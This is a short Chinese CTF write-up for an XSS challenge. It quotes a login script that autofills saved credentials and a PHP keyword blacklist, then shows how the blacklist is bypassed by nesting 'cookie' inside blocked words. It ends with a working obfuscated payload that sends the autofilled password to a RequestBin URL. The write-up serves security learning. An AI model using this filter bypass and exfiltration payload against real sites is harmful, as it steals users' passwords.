登录页面f12可以看到<script src="./js/login.js"></script>,访问可以看到部分源码:
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}
该代码表示其将用户名和密码都填入了表单(记住密码功能).之后随意注册一个用户,登录.进去后告诉我们这题不是注入.点击上方的feedback,发现有个输入框,f12发现注释的地方有源码:
if(is_array($feedback)){
echo "<script>alert('反馈不合法');</script>";
return false;
}
$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];
foreach ($blacklist as $val) {
while(true){
if(stripos($feedback,$val) !== false){
$feedback = str_ireplace($val,"",$feedback);
}
else{
break;
}
}
}
根据blacklist的内容和输入框可以猜测是xss.代码中对blacklist的过滤只是将其替换为空,很好绕过,例如input写成incookieput即可.(插入cookie是因为cookie是blacklist中的最后一个词,匹配到cookie后循环就结束了.)
看了大佬wp说本题有csp,无法引入外部js,所以从题目本身的js下手.login.js有记住密码功能,于是构造payload写进feedback的输入框中提交,利用buu的RequestBin来接收反馈.
payload:
<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>
var passwd = documcookieent.getElemcookieentsByName("password")[0].value;
documcookieent.locacookietion="http://http.requestbin.buuoj.cn/s4dpjps4/?a="+passwd;
</scricookiept>
提交成功后稍等一段时间,在requestbin就能看到flag了.
No responses yet